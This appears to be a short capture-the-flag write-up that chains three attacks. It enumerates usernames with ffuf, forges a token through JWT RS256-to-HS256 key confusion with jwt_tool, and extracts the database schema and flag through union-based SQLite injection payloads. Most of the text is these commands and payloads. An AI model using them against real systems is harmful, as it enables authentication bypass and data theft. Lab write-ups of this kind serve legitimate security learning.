Under Construction
Last updated
Was this helpful?
Last updated
Was this helpful?
ffuf -request req -w ../../usernames.txt -mr exists -u -s
Usernames:
gale
rosie
⢠Key Confusion [RS256 > HS256]
./jwt_tool.py -t -rc "session=[jwt]" -X k -pk ../../challenges/uc/pk -v
⢠sqlite_version()
<> -I -pc username -pv "test123' union select 1,sqlite_version(),3 -- "
⢠table name
-I -pc username -pv "test123' union select 1,(select tbl_name from sqlite_master limit 0,1),3 -- "
⢠column names [table create query in output is referred to check the column names]
-I -pc username -pv "test123' union select 1,(select sql from sqlite_master limit 0,1),3 -- "
⢠flag
-I -pc username -pv "test123' union select 1,(select <column-name> from <tname> limit 0,1),3 -- "
-------------------------------------------------
observations:
-------------------------------------------------
⢠JWT public key is present in JWT token
⢠Enumerate usernames
⢠JWT key confusion due to accepting both RS256 and HS256
⢠sqli is present on getUser request as input not escaped